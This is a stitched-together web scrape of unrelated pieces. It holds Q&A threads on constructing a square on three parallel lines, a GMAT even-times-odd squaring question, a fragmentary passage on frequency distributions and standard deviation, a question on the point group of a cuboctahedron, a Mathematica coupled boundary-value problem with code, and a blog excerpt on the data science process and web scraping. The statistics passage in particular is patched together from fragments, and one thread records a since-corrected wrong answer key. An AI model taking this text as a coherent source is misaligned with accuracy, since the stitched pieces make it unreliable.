2) There are two other solutions (@greedoid has found one of them, and I am grateful to her/him to have pointed in this direction). Let us recall that figure 1 was based on a right triangle with legs $$(d,d')$$. But using an auxiliary (dotted) line whose definition we leave to the reader, we get triangles with legs $$(d+d',d)$$ (Fig. 2) and $$(d+d',d')$$ (Fig. 3).
Fig. 2.
Fig. 3.
Algebraic solution :
Consider that coordinate axes have been chosen in such a way that the current points on the different lines are resp.
$$A_0(x_0,a), \ \ A_1(x_1,b), \ \ A_2(x_2,c).$$
with $$a,b,c$$ fixed. As the issue is translation invariant, one may assume WLOG that $$x_0:=0$$.
The constraints of the problem are twofold:
$$\begin{cases}\|\vec{A_0A_1}\|^2=\|\vec{A_0A_2}\|^2\\ \vec{A_0A_1} \perp \vec{A_0A_2} \end{cases}\tag{*}$$
As $$\vec{A_0A_1}=\binom{x_1}{u}$$ and $$\vec{A_0A_2}=\binom{x_2}{v}$$ with
$$u:=b-a$$ and $$v:=c-a$$, we can transform (*) into the following system of 2 equations with 2 unknowns:
$$\begin{cases}x_1^2+u^2=x_2^2+v^2\\ x_1x_2+uv=0\end{cases}\tag{**}$$
This system has clearly two solutions
$$\begin{cases}x_1=v\\ x_2=-u \end{cases} \ \ \text{and} \ \ \begin{cases}x_1=-v\\ x_2=u \end{cases} \tag{***}$$
and there are no other solutions: eliminating $$x_2$$ turns system (**) into a quadratic equation in $$x_1^2$$, namely $$(x_1^2-v^2)(x_1^2+u^2)=0$$, whose only admissible root is $$x_1^2=v^2$$.
Result (***) is in complete agreement with any of the 3 solutions found in the geometrical solution.
What we have done for one of the straight lines can be done for any of the two others (we haven't made any assumption on the order of numbers $$a,b,c$$) : this explains why we have 3 essentially different solutions.
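As a numerical cross-check of (***) (my own sketch, not part of the original answer; the line heights a = 0, b = 2, c = 5 are arbitrary illustrative values):

(* lines y == a, y == b, y == c; p0, p1, p2 stand for the points A0, A1, A2 above *)
With[{a = 0, b = 2, c = 5},
 Module[{u, v, p0, p1, p2},
  u = b - a; v = c - a;
  p0 = {0, a}; p1 = {v, b}; p2 = {-u, c};
  (* equal side lengths and a right angle at p0 *)
  {Norm[p1 - p0] == Norm[p2 - p0], (p1 - p0).(p2 - p0) == 0}]]
(* {True, True} *)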
• This is a bit complex for me. I was wondering what implies that the angle BOB' is a 90-degrees? – NoChance Feb 20 at 10:51
• Angle AOA' is a flat angle (180°). If you subtract from it angles AOB ($\alpha$ degrees) and A'OB' ($90° - \alpha$), what remains is angle BOB' = $180°- (\alpha+90°-\alpha)=90°$. Remark : conversion degrees - radians is done using $\frac{\pi}{2}=90°$. – Jean Marie Feb 20 at 11:08
• Thanks for your clarification. What I meant to ask is, the steps used in the construction of the square don't imply that BOB' is 90 degrees or that $A'OB'=\frac{\pi}{2}-\alpha$ – NoChance Feb 20 at 11:35
• No, all what I do is to construct right triangles OAB and OA'B' which are identical triangles, thus with say the most acute angle $\alpha$, and the less acute angle $(90°-\alpha)$ for both of them. Nothing more. Of course, I have, afterwards, completed my drawing by displaying the "finished" square. – Jean Marie Feb 20 at 11:42
• I have added an algebraic solution. – Jean Marie Feb 24 at 14:46
HINT: see diagram below to find that side $$l$$ of the square is equal to $$\sqrt{a^2+b^2}$$.
EDIT. As pointed out by greedoid, there are two more solutions:
First case: $$A$$ is on the inner line (left picture). The rotation by $$90^{\circ}$$ around $$A$$ takes $$B$$ to $$D$$, so it takes the line containing $$B$$ to a new line which cuts the other outer line in $$D$$.

Second case: $$A'$$ is on the outer line (right picture). The rotation by $$90^{\circ}$$ around $$D'$$ takes $$A'$$ to $$C'$$, so it takes the line containing $$A'$$ to a new line which cuts the inner line in $$C'$$.
• [+1] I hadn't thought to this second solution. – Jean Marie Feb 21 at 0:08
• There is a third solution where the right angle is situated on the third line. – Jean Marie Feb 22 at 10:43
A vertex is a point. A line is a set of points. The problem asks of you to construct a square such that the given lines "pass through" three vertices of the square.
• Good. A drawing would help. – NoChance Feb 19 at 22:40
Let $$l$$, $$k$$ and $$m$$ be given parallel lines such that $$k$$ is placed between $$l$$ and $$m$$.
For example, see Aretino's picture.
Let $$m$$ be the upper line, $$k$$ the middle line and $$l$$ the lower line.
Let $$A\in k$$ and $$R^{90^{\circ}}_A$$ be a rotation around $$A$$ by $$90^{\circ}.$$
Now, let $$R^{90^{\circ}}_A(l)\cap m=\{B\}$$ and $$R^{-90^{\circ}}_A(m)\cap l=\{D\}$$.
Thus, $$AB\perp AD$$ and $$AB=AD$$.
Can you end it now?
• Can the down-voter explain why? – Michael Rozenberg Feb 20 at 8:31
• @greedoid Was it your down-vote? – Michael Rozenberg Feb 20 at 8:39
• Your solution is incomplete and very hard to read. Also, how you came up with those rotations? Fix that and I will upvote. – Aqua Feb 20 at 10:21
• @greedoid I fixed it, but you could have told me before; I am ready to explain. – Michael Rozenberg Feb 20 at 10:42
• Basically you changed nothing; also, this problem has 2 noncongruent solutions. – Aqua Feb 20 at 10:47
|
|
# An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
An even and an odd integer are multiplied together. Which of the following could not be the square of their product?
(A) 36
(B) 100
(C) 144
(D) 225
(E) 400
Kudos for a correct solution.
36 = $$6^2$$, 6 = 2*3 ---> Possible
100 = $$10^2$$, 10 = 2*5 ---> Possible
144 = $$12^2$$, 12 = 4*3 ---> Possible
225 = $$15^2$$, 15 = 3*5 ---> Not possible
400 = $$20^2$$, 20 = 4*5 ---> Possible
Hi All,
This is an example of a question that can be solved with Number Properties; NPs show up in a variety of questions on Test Day (including many DS questions), so putting some extra practice into this category is a good idea for most Test Takers.
Here, we're told to take the product of an EVEN integer and an ODD integer. (Even)(Odd) = Even. Next, we're asked to SQUARE that result. (Even)^2 = Even. The question asks for the answer that could NOT be the result of using these Number Properties as described. Since we know the end result MUST be Even, there's only one answer here that could NOT occur....
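As a quick mechanical check (a one-liner sketch in Mathematica, not part of the original post; the list is just the five answer choices):

(* (even*odd)^2 is always even, so the lone odd choice cannot occur *)
Select[{36, 100, 144, 225, 400}, OddQ]
(* {225} *)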
Answer: D
GMAT assassins aren't born, they're made,
Rich
The product of an even and an odd integer will always be divisible by 2.
So if we square the product, it will be divisible by 4.
Only 225, among the given numbers, is not divisible by 4, and hence is the required answer.
Should be D
$$even\,\times\,odd\,=\,even$$
$$(even\,\times\,odd)^2\,=\,even^2\,\times\,odd^2\,=\,even$$; the resultant should be even
here $$225$$ is the odd one out
2*3=6 and 6^2=36
5*2=10 and 10^2=100
3*4=12 and 12^2=144
5*4=20 and 20^2=400
225 = 15^2, and 15 has no even factor, so 225 cannot arise this way. Answer: D
Hi Bunuel,
I think there might be a mistake here, the GMAT timer is showing C as the correct answer, is the answer not D?
VERITAS PREP OFFICIAL SOLUTION
One way to approach this problem is to start with an even and an odd integer and plug them into the parameters set by the problem. If we begin with two and three, we see that the product is six and the square of the product is thirty-six.
(2)(3) = 6; 6^2 = 36
Similarly we can see that two and five, three and four, and four and five all give us possible answer choices.
(2)(5) = 10; 10^2 = 100
(4)(3) = 12; 12^2 = 144
(4)(5) = 20; 20^2 = 400
Answer choice (D) is also a perfect square, but if we take its square root we get fifteen, which cannot be written as the product of an even and an odd integer. Thus the only answer that could not be the squared product of an even and an odd integer is answer choice (D).
achilds wrote:
Hi Bunuel,
I think there might be a mistake here, the GMAT timer is showing C as the correct answer, is the answer not D?
Yes, the correct answer is D. Edited the OA in the original post. Thank you for noticing this.
(A) 36 = (1×6)^2
(B) 100 = (1×10)^2
(C) 144 = (1×12)^2
(D) 225 - all factors are odd for this number, so this is our answer
(E) 400 = (1×20)^2
This can simply be done in a second: even × odd always gives an even number, and the square of an even number is even. Except for 225, all the choices are even.
Even times odd should give us an even result.
The only odd answer choice is 225 = 15 × 15, which is odd and couldn't be the product of an odd and an even number.
(even*odd)^2 = ?
Checking options
(A) 36 = 2^2*3^2 Possible
(B) 100 = 2^2*5^2 Possible
(C) 144 = 2^4*3^2 Possible
(D) 225 = 3^2*5^2 NOT possible, as no factor of 2 is present
(E) 400 = 2^4*5^2 Possible
It did not take much time: simply scan the values as even or odd, and there it is - D.
Plugging in numbers is a good way to cross-check, and still worth doing, considering that scanning the numbers took so little time.
|
|
A frequency distribution presents data in tabular form, indicating how often each value or class of values occurs; the classes can be single data points or data ranges. Analysts and researchers can use frequency distributions to evaluate anything from survey data to historical investment returns and prices (investment types include stocks, bonds, mutual funds and broad market indexes). A more elegant way to turn data into information is to draw a graph of the distribution; it is customary to list the values from lowest to highest. (On a statistics calculator, one enters the data values one at a time; the display shows the running count n = 1, n = 2, ... until all data points have been entered.)

To obtain the mean, variance and standard deviation from a frequency table, with ${x}$ the different values of the items, ${f}$ their frequencies and ${N}$ the total number of observations: the mean is the frequency-weighted sum of the values divided by ${N}$, the variance is the average squared deviation from that mean, and variance = (standard deviation)² = σ×σ. For grouped data, assume that the frequency in each class is centered at the class mid-point and compute with the mid-points. To calculate the mean deviation (also referred to as the mean absolute deviation) of a continuous frequency distribution, calculate the differences between each interval's mid-point and the mean, multiply each difference by the interval's frequency, sum all the produced values, and finally divide the sum by the total number of values (the total frequency).

A rough estimate of the standard deviation is the range divided by four. For example, if we calculate the range of a data set as 25 - 12 = 13 and divide by four, we get an estimated standard deviation of 13/4 = 3.25; for a sample with these extremes, a mean of 17 and a true standard deviation of about 4.1, this estimate is relatively close.

A standard normal (Z-) distribution has a bell-shaped curve with mean 0 and standard deviation 1; the standard deviation is measured by the distance from the mean to the inflection point (where the curvature of the bell changes from concave up to concave down). Any score from a normal distribution can be converted to a z-score if the mean and standard deviation are known: z-score = (score - mean score) / standard deviation. So, if the score is 130, the mean is 100 and the standard deviation is 15, then z = (130 - 100)/15 = 2.

For a single die, the expectation (or mean) of the roll is 3.5, halfway between the outcomes 1 and 6. The distribution of sample means over repeated samples is called the sampling distribution of the mean; for samples of size 2 drawn from a discrete population (such as pool balls), both the population distribution and the sampling distribution are discrete. As an example: for a sample of 100 females with mean weight 65 kg and standard deviation 20 kg, the sample mean can be taken as equivalent to the population mean, since the sample size is more than 30. A Poisson distribution calculator, similarly, gives the probability of a given number of events occurring in a fixed interval of time from the known average rate of events; it requires the average rate of success and the value of the Poisson random variable, and can also return the cumulative Poisson probability.

In code, the mean and standard deviation can be computed directly from scores s and frequencies f; this avoids the use of rep, which is a hassle when the numbers are large:

Sx = sum(s*f)
Sx2 = sum((s^2)*f)
n = sum(f)
theMean = Sx/n
SSx = Sx2 - n*theMean^2
sVar = SSx/(n-1)
ssd = sqrt(sVar)
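As a minimal sketch of the same frequency-table computation in Mathematica (the values vals and frequencies freqs are made up for illustration):

vals = {62, 64, 66, 68, 70}; freqs = {5, 9, 12, 8, 6};
n = Total[freqs];                                   (* total number of observations *)
mean = Total[vals*freqs]/n;                         (* frequency-weighted mean *)
var = (Total[freqs*vals^2] - n*mean^2)/(n - 1);     (* sample variance *)
{N[mean], N[Sqrt[var]]}                             (* mean and standard deviation *)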
|
|
# What is the symmetry of the cuboctahedron (FCC metal)?
The background to this is that I've recently given a tutorial wherein we had to go through the determination of point groups for atoms in various lattices (BCC, FCC/CCP and HCP). BCC and HCP I have no problem with. However, I've now acquired a copy of the lecturer's "official" solutions and there's a discrepancy with the FCC that I can't fathom: I get an $$O_\mathrm{h}$$ point group, while he gives a $$D_\mathrm{3d}$$ point group.
Here goes:
The coordination geometry of an atom in the FCC structure (assuming one atom/lattice point and only one species of atom, as in an FCC metal) is a cuboctahedron:
[Image: a cuboctahedron]
By my reckoning we have $$3$$ $$C_4$$ axes, one through each pair of square faces, and a $$C_3$$ through each pair of triangular faces.
Following the classic flowchart:
The number of high-symmetry rotational axes is surely enough to exclude $$D_\mathrm{3d}$$ already?
The only thing that makes me think that the lecturer hasn't just made an error is this line from the Wikipedia page for the cuboctahedron:
With $$O_\mathrm{h}$$ symmetry, order $$48$$, it is a rectified cube or rectified octahedron (Norman Johnson).
With $$T_\mathrm{d}$$ symmetry, order $$24$$, it is a cantellated tetrahedron or rhombitetratetrahedron.
With $$D_\mathrm{3d}$$ symmetry, order $$12$$, it is a triangular gyrobicupola.
This is no doubt due to deficiencies in my understanding of group theory, but I don't understand how the same shape can simultaneously have multiple point groups, nor how you would select which one is relevant to a particular analysis.
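As a computational aside (my own sketch, not from the lecturer's solutions): taking the 12 vertices of the cuboctahedron to be the coordinate permutations of $$(\pm 1, \pm 1, 0)$$, one can count the signed permutation matrices that map the vertex set to itself, which reproduces the order 48 of $$O_\mathrm{h}$$:

(* the 12 vertices: all coordinate permutations of (±1, ±1, 0) *)
verts = Union @@ (Permutations /@ Tuples[{{-1, 1}, {-1, 1}, {0}}]);
(* the 48 signed permutation matrices (the symmetries of the cube) *)
mats = Flatten[Outer[Dot, DiagonalMatrix /@ Tuples[{-1, 1}, 3],
    Permutations[IdentityMatrix[3]], 1], 1];
(* count those that map the vertex set to itself *)
Count[mats, m_ /; Sort[verts.Transpose[m]] === Sort[verts]]
(* 48 *)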
• I will update the question to make this clearer, but the assumption when solving was that we had an FCC metal structure, ie. only one atom. The Wikipedia quote was from a geometry article and, afaik, refers only to the polyhedron and doesn't consider any "atoms" or similar. – Wandering Chemist Feb 21 '17 at 16:39
• Oh is correct, so they went off the rails there somewhere. – Jon Custer Feb 21 '17 at 16:57
• @WanderingChemist You are right, the symmetry of a cubooctahedron is similar to that of a cube and/or octahedron, i.e. $O_h$. – Ivan Neretin Feb 21 '17 at 17:13
• @JonCuster, IvanNeretin, Thanks! In that case, do you know what the quote from the Wikipedia article is on about when it discusses an cuboctahedron "with Oh symmetry", "with Td symmetry"? Is that just a situation where something is added to certain locations on the shape to reduce its symmetry? – Wandering Chemist Feb 22 '17 at 9:45
• I might suggest that you seem to be blurring the line between point groups and space groups in your latest comment. The 'adding things to reduce symmetry' is, roughly speaking, what happens to turn the (fewer) point groups in to (the many) space groups. – Jon Custer Feb 22 '17 at 13:55
|
|
# Boundary value problem, multiple dimensional shooting, coupled eigenvalue problem
Following the one-dimensional boundary value problem here, I would like to understand the easiest way to solve a BVP for a coupled system. In the 1D case, the BVP can be converted to an initial value problem and solved using the shooting method, which is easily automated with bisection.
On the other hand, when there is more than one boundary value to guess, bisection is simply not possible. Therefore the question is: what would be the most efficient method for such problems?
To show the problem concretely, I have the following ODE system.
\begin{align} ( \frac{\tilde \mu_1^2}{B} -1 ) \tilde \Phi_1^2 + \frac{1}{A} {\tilde \Phi_1^{\prime 2}} + \frac{1}{2}\tilde \lambda_1 \tilde \Phi_1^4 + \frac{1}{2}\tilde \lambda_{12} \tilde \Phi_1^2 \tilde \Phi_2^2 +\frac{\tilde \mu_2^2}{B} \tilde \Phi_2^2 + \frac{1}{A} {\tilde \Phi_2^{\prime 2}} - \frac{A'}{\tilde r A^2} + \frac{1}{\tilde r^2 A} - \frac{1}{\tilde r^2} &= 0, \cr
( \frac{\tilde \mu_1 ^2 }{B} + 1 )\tilde \Phi_1^2 + \frac{1}{A} \tilde \Phi_1^{\prime 2} - \frac{1}{2}\tilde \lambda_1 \tilde \Phi_1^4 - \frac{1}{2}\tilde \lambda_{12} \tilde \Phi_1^2 \tilde \Phi_2^2 + \frac{\tilde \mu_2 ^2 }{B} \tilde \Phi_2^2 + \frac{1}{A} \tilde \Phi_2^{\prime 2} -\frac{B'}{\tilde r A B} - \frac{1}{\tilde r^2 A} + \frac{1}{\tilde r^2} &= 0, \cr
\frac{1}{A}{\tilde \Phi_1^{\prime\prime }} +\left (\frac{\tilde \mu_1^2}{B} + 1 \right )\tilde \Phi_1 + \tilde \Phi'_1 \left (\frac{B'}{2 AB} - \frac{A'}{2A^2} + \frac{2}{A \tilde r}\right ) - \tilde \lambda_1 \tilde \Phi_1^3 - \frac{\tilde \lambda_{12}}{2} \tilde \Phi_2^2 \tilde \Phi_1 &= 0, \cr
\frac{1}{A}{\tilde \Phi_2^{\prime\prime }} +\left (\frac{\tilde \mu_2^2}{B} \right )\tilde \Phi_2 + \tilde \Phi'_2 \left (\frac{B'}{2 AB} - \frac{A'}{2A^2} + \frac{2}{A \tilde r}\right ) - \frac{\tilde \lambda_{12}}{2} \tilde \Phi_1^2 \tilde \Phi_2 &= 0, \end{align}
where $\tilde \Phi_1(\tilde r), \tilde \Phi_2(\tilde r), A(\tilde r), B(\tilde r)$ are the functions to be solved for, with boundary conditions
\begin{align} A(\infty) & = 1, \cr B(\infty) & = 1, \cr \tilde \Phi_1'(0) & = 0, \cr \tilde \Phi_1(\infty) & = 0, \cr \tilde \Phi_2'(0) & = 0, \cr \tilde \Phi_2(\infty) & = 0. \end{align}
So there are $four$ functions and $six$ undetermined coefficients related to all the derivatives. On the other hand, there are $four$ equation constraints and $six$ boundary values, so it should be solvable. There should be a class of $(\tilde \mu, \tilde \Phi)$, among which I want to select the 'ground state', $i.e.$ those $\tilde \Phi$'s that do not have zeros at finite $\tilde r$.
However, FEM cannot handle it, as it is not a linear coupled ODE system. Using NDSolve directly takes too long and never returns any results, although no error is thrown either. Any ideas?
Code:
Clear[GRHunterPhi4twoS2]
GRHunterPhi4twoS2[Omega_, Omega2_, \[CapitalLambda]1_, \[CapitalLambda]12_, xEnd1_] :=
 Module[{},
  (* Eliminate A via the mass function M: A = 1/(1 - 2 M/x) *)
  Arule = {A[x] -> (1 - 2*(M[x]/x))^(-1),
    Derivative[1][A][x] -> D[(1 - 2*(M[x]/x))^(-1), x]};
  eq1 = -Derivative[1][M][x] +
      x^2*((1/2)*(Omega^2/B[x] - 1)*\[Sigma][x]^2 +
        (1/2)*(Omega2^2/B[x])*\[Sigma]2[x]^2 +
        (\[CapitalLambda]1/4)*\[Sigma][x]^4 +
        (\[CapitalLambda]12/4)*\[Sigma][x]^2*\[Sigma]2[x]^2 +
        Derivative[1][\[Sigma]][x]^2/2/A[x] +
        Derivative[1][\[Sigma]2][x]^2/2/A[x]) == 0 /. Arule;
  eq2 = Derivative[1][B][x]/A[x]/B[x]/x - (1/x^2)*(1 - 1/A[x]) -
      (Omega^2/B[x] + 1)*\[Sigma][x]^2 - (Omega2^2/B[x])*\[Sigma]2[x]^2 +
      (\[CapitalLambda]1/2)*\[Sigma][x]^4 +
      (\[CapitalLambda]12/2)*\[Sigma][x]^2*\[Sigma]2[x]^2 -
      Derivative[1][\[Sigma]][x]^2/A[x] -
      Derivative[1][\[Sigma]2][x]^2/A[x] == 0 /. Arule;
  eq3 = Derivative[2][\[Sigma]][x] +
      (2/x + Derivative[1][B][x]/2/B[x] - Derivative[1][A][x]/2/A[x])*
       Derivative[1][\[Sigma]][x] +
      A[x]*((Omega^2/B[x] + 1)*\[Sigma][x] - \[CapitalLambda]1*\[Sigma][x]^3 -
        (\[CapitalLambda]12/2)*\[Sigma]2[x]^2*\[Sigma][x]) == 0 /. Arule;
  eq4 = Derivative[2][\[Sigma]2][x] +
      (2/x + Derivative[1][B][x]/2/B[x] - Derivative[1][A][x]/2/A[x])*
       Derivative[1][\[Sigma]2][x] +
      A[x]*((Omega2^2/B[x])*\[Sigma]2[x]) -
      (\[CapitalLambda]12/2)*\[Sigma]2[x]*\[Sigma][x]^2 == 0 /. Arule;
  (* Regularized boundary conditions at xStart1 and xEnd1 *)
  bc = {M[xStart1] == epsilon, Derivative[1][\[Sigma]][xStart1] == epsilon,
    Derivative[1][\[Sigma]2][xStart1] == epsilon, B[xEnd1] == 1,
    \[Sigma][xEnd1] == epsilon, \[Sigma]2[xEnd1] == epsilon};
  sollst1 = NDSolveValue[Flatten[{eq1, eq2, eq3, eq4, bc}],
    {M, B, \[Sigma], \[Sigma]2}, {x, xStart1, xEnd1},
    Method -> "StiffnessSwitching", WorkingPrecision -> WorkingprecisionVar,
    AccuracyGoal -> accuracyVar, PrecisionGoal -> precisionGoalVar,
    MaxSteps -> Infinity]]
precisionVar = 40;
psiEndTolerance = 10^(-5);
epsilon = 10^(-6);
xStart1 = 10^(-5);
xEnd1 = 30;
WorkingprecisionVar = 23;
accuracyVar = 9;
precisionGoalVar = 9;
Off[NDSolveValue::precw]
tmpSol = GRHunterPhi4twoS2[2, 2, 100, 50, xEnd1]
Plot[tmpSol[[4]][tmpx], {tmpx, xStart1, xEnd1}, PlotRange -> All]
P.S.: my thought is to somehow convert the above equation set into a matrix representation. Then one could perhaps make use of the built-in Eigensystem[]. In this sense, with the boundary conditions fulfilled, it can also be treated as an eigenvalue problem for $(\tilde \mu_1, \tilde \Phi_1)$ and $(\tilde \mu_2, \tilde \Phi_2)$. However, the non-linear terms $\tilde \Phi^n$ make this hard as well.
• My attempt: by setting $A(\tilde r) = 1/(1-2M(\tilde r) /\tilde r)$, I can replace $A(\infty)=1$ with $M(0) = 0$, which makes the system slightly easier to solve. Also, $B(\infty)=1$ can be relaxed to $B(\infty) = const.$ Now the hard part is $\tilde \Phi_1(\infty)$ and $\tilde \Phi_2(\infty)$. When there is only one $\tilde \Phi$, I could tackle the boundary value problem with the shooting method. I doubt the shooting method can ever be used for this case. – Boson Bear Apr 18 '18 at 23:13
• I think this post is very useful, although I have not found a way to implement the $\tilde \Phi^4$ terms yet... – Boson Bear Apr 19 '18 at 0:48
• Unless you provide the code you have so far, I think it is unlikely that you will receive much help; no one feels like typing all those equations. Why don't you share the NDSolve code that takes too long? – user21 Apr 19 '18 at 5:01
• Thank you for the reminder, @user21. My bad. I have edited the post with the code I have so far. – Boson Bear Apr 19 '18 at 15:38
• Update: another very useful and relevant post is here, given by bbgodfrey. Learning it now and will update if it solves the problem. Getting warm right now. – Boson Bear Apr 19 '18 at 20:21
# Data Science Process (Best Tutorial 2019)
## The Data Science Process
Data science and analytics continue to evolve at a rapid pace. The current hype surrounding AI and deep learning has given rise to yet again another collection of skills that organizations are looking for.
In any case, data science is about extracting value from data in a grounded manner, where one realizes that data requires a lot of treatment and work from a lot of stakeholders before becoming valuable. This tutorial explains the data science process with examples.
As such, data science as an organizational activity is oftentimes described by means of a “process”: a workflow describing the steps that have to be undertaken in a data science project.
Consider, for example, the construction of a predictive model to forecast who is going to churn or which customers will react positively to a marketing campaign, a customer segmentation task, or simply the automated creation of a periodic report listing some descriptive statistics.
As a data scientist (or someone aspiring to become one), you have probably already experienced that “data science” has become a very overloaded term indeed.
Companies are coming to terms with the fact that data science incorporates a very broad skill set that is nearly impossible to find in a single person, hence the need for a multidisciplinary team involving:
• Fundamental theorists, mathematicians, statisticians (think: regression, Bayesian modeling, linear algebra, Singular Value Decomposition, and so on).
• Data wranglers (think: people who know their way around SQL, Python's pandas library, and R's dplyr).
• Analysts and modelers (think: building a random forest or neural network model using R or SAS).
• Database administrators (think: DB2 or MSSQL experts, people with a solid understanding of databases and SQL).
• Business intelligence experts (think: reporting and dashboards, as well as data warehouses and OLAP cubes).
• IT architects and “DevOps” people (think: people maintaining the modeling environment, tools, and platforms).
• Big data platform experts (think: people who know their way around Hadoop, Hive, and Spark).
• “Hacker” profiles (think: people comfortable on the command line, who know a bit of everything, can move fast, and break things).
• Business integrators, sponsors, and champions (think: people who know how to translate business questions to data requirements and modeling tasks, and can translate results back to stakeholders, and can emphasize the importance of data and data science in the organization).
• Management (think: higher-ups who put a focus on data on the agenda and have it trickle down throughout all layers of the organization).
• Web scrapers (think: people who can collect data from websites to enrich internal data sets).
The raw material in all of this is data. Many process frameworks have been proposed for working with it, with CRISP-DM and the KDD (Knowledge Discovery in Databases) process being the two most popular ones these days.
CRISP-DM stands for the “Cross-Industry Standard Process for Data Mining.” Polls conducted by KDnuggets (Machine Learning, Data Science, Big Data, Analytics, AI) over the past decade show that it is the leading methodology used by industry data miners and data scientists.
CRISP-DM is well-liked as it explicitly highlights the cyclic nature of data science: you’ll often have to go back to the beginning to hunt for new data sources in case the outcome of a project is not in line with what you expected or had hoped for.
The KDD process is a bit older than CRISP-DM and describes very similar steps (more as a straight-through path, though here, too, one has to keep in mind that going back a few steps can be necessary). It includes:
• ### Identify the business problem:
Similar to the “Business Understanding” step in CRISP-DM, the first step consists of a thorough definition of the business problem.
Some examples: customer segmentation of a mortgage portfolio, retention modeling for a postpaid telco subscription, or fraud detection for credit cards. Defining the scope of the analytical modeling exercise requires a close collaboration between the data scientist and business expert.
Both need to agree on a set of key concepts, such as: How do we define a customer, transaction, churn, fraud, etc.? What is it we want to predict (and how do we define it)? And when are we happy with the outcome?
• ### Identify data sources:
Next, all source data that could be of potential interest need to be identified. This is a very important step as data is the key ingredient to any analytical exercise and the selection of data has a deterministic impact on the analytical models built in a later step.
• ### Select the data:
The general golden rule here is the more data, the better, though data sources that have nothing to do with the problem at hand should be discarded during this step. All appropriate data will then be gathered in a staging area and consolidated into a data warehouse, data mart, or even a simple spreadsheet file.
• ### Clean the data:
After the data has been gathered, a long series of preprocessing and data-wrangling steps follows to remove all inconsistencies, such as missing values, outliers, and duplicate data.
• ### Transform the data:
The preprocessing step will often also include a lengthy transformation part as well. Additional transformations may be considered, such as alphanumeric to numeric coding, geographical aggregation, logarithmic transformation to improve symmetry, and other smart “featurization” approaches.
• ### Analyze the data:
The steps above correspond with the “Data Understanding” and “Data Preparation” steps in CRISP-DM. Once the data is sufficiently cleaned and processed, the actual analysis and modeling can begin (referred to as “Modeling” in CRISP-DM).
Here, an analytical model is estimated on the preprocessed and transformed data. Depending on the business problem, a particular analytical technique will be selected and implemented by the data scientist.
• ### Interpret, evaluate, and deploy the model:
Finally, once the model has been built, it will be interpreted and evaluated by the business experts (denoted as “Evaluation” in CRISP-DM). Trivial patterns and insights that may be detected by the analytical model can still be interesting as they provide a validation of the model.
But, of course, the key challenge is to find the unknown, yet interesting and actionable patterns that can provide new insights into your data.
Once the analytical model has been appropriately validated and approved, it can be put into production as an analytics application (e.g., decision support system, scoring engine, etc.).
It is important to consider how to represent the model output in a user-friendly way, how to integrate it with other applications (e.g., marketing campaign management tools, risk engines, etc.), and how to ensure the analytical model can be appropriately monitored on an ongoing basis.
Often, the deployment of an analytical model will require the support of IT experts that will help to “productionize” the model.
### Where Does Web Scraping Fit In?
There are various parts of the data science process where web scraping can fit in. In most projects, however, web scraping will form an important part in the identification and selection of data sources. That is, to collect and gather data you can include in your data set to be used for modeling.
It is important to provide a warning here, which is to always keep the production setting of your constructed models in mind (the “model train” versus “model run” gap).
If you are building a model as a one-shot project that will be used to describe or find some interesting patterns, then, by all means, utilize as much scraped and external data as desired.
In case a model will be productionized as a predictive analytics application, however, keep in mind that the model will need to have access to the same variables at the time of deployment as when it was trained.
You'll hence need to consider carefully whether it will be feasible to incorporate scraped data sources in such a setup, as it needs to be ensured that the same sources will remain available and that it will be possible to continue scraping them as you go forward.
Websites can change, and a data collection part depending on web scraping requires a great deal of maintenance to implement fixes or changes in a timely manner. In these cases, you still might wish to rely on a more robust solution like an API.
Depending on your project, this requirement might be more or less troublesome to deal with. If the data you've scraped refers to aggregated data that "remains valid" for the duration of a whole year, for instance, then you can, of course, continue to use the collected data when running the models during deployment as well (and schedule a refresh of the data well before the year is over).
Always keep the production set of a model in mind: Will you have access to the data you need when applying and using the model as well, or only during the time of training the model?
Who will be responsible to ensure this data access? Is the model simply a proof of concept with a limited shelf life, or will it be used and maintained for several years going forward?
In some cases, the web scraping part will form the main component of a data science project. This is common in cases where some basic statistics and perhaps an appealing visualization is built over scraped results to present findings and explore the gathered data in a user-friendly way.
Still, the same questions have to be asked here: Is this a one-off report with a limited use time, or is this something people will want to keep up to date and use for a longer period of time?
The way you answer these questions will have a great impact on the setup of your web scraper.
In case you only need to gather results using web scraping for a quick proof of concept, a descriptive model, or a one-off report, you can afford to sacrifice robustness for the sake of obtaining data quickly.
In case scraped data will be used during production as well (as was the case for the yearly aggregated information), it can still be feasible to scrape results, although it is a good idea to already think about the next time you’ll have to refresh the dataset and keep your setup as robust and well-documented as possible.
If information has to be scraped every time the model is run, the "scraping" part now effectively becomes part of the deployed setup, including all the headaches that come along with it regarding monitoring, maintenance, and error handling. Make sure to agree upfront on which teams will be responsible for this!
There are two other “managerial warnings” we wish to provide here. One relates to data quality.
If you’ve been working with data in an organizational setting, you’ve no doubt heard about the GIGO principle: garbage in, garbage out. When you rely on the World Wide Web to collect data — with all the messiness and unstructuredness that goes with it — be prepared to take a “hit” regarding data quality.
Indeed, it is crucial to incorporate as much cleaning and fail-safes as possible in your scrapers, though you will nevertheless almost always eventually encounter a page where an extra unforeseen HTML tag appears or the text you expected is not there, or something is formatted just slightly differently. A final warning relates to reliability.
The same point holds, in fact, not just for web scraping but also for APIs. Many promising startups have appeared over the past years that utilize Twitter's, Facebook's, or some other provider's API to provide a great service.
What happens when the provider or owner of that website decides to increase their prices for what they’re offering to others? What happens if they retire their offering?
Many products have simply disappeared because their provider changed the rules. Using external data, in general, is oftentimes regarded as a silver bullet — “If only we could get out the information Facebook has!” — though think carefully and consider all possible outcomes before getting swayed too much by such ideas.
The business layer is the transition point between the nontechnical business requirements and desires and the practical data science where, I suspect, most readers of this blog will want to spend their careers, doing the perceived more interesting data science work.
The business layer does not belong to the data scientist 100%, and normally, its success represents a joint effort among such professionals as business subject matter experts, business analysts, hardware architects, and data scientists.
The business layer is where we record the interactions with the business. This is where we convert business requirements into data science requirements. The business layer must support the comprehensive collection of entire sets of requirements, to be used successfully by the data scientists.
If you just want to process and wrangle data with your impressive data science skills, this may not be the start to a blog about practical data science that you would expect.
I suggest, however, that you read this blog if you want to work in a successful data science group. As a data scientist, you are not in control of all aspects of a business, but you have a responsibility to ensure that you identify the true requirements.
#### The Functional Requirements
Functional requirements record the detailed criteria that must be followed to realize the business’s aspirations from its real-world environment when interacting with the data science ecosystem. These requirements are the business’s view of the system, which can also be described as the “Will of the Business.”
Tip Record all the business’s aspirations. Make everyone supply their input. You do not want to miss anything, as later additions are expensive and painful for all involved.
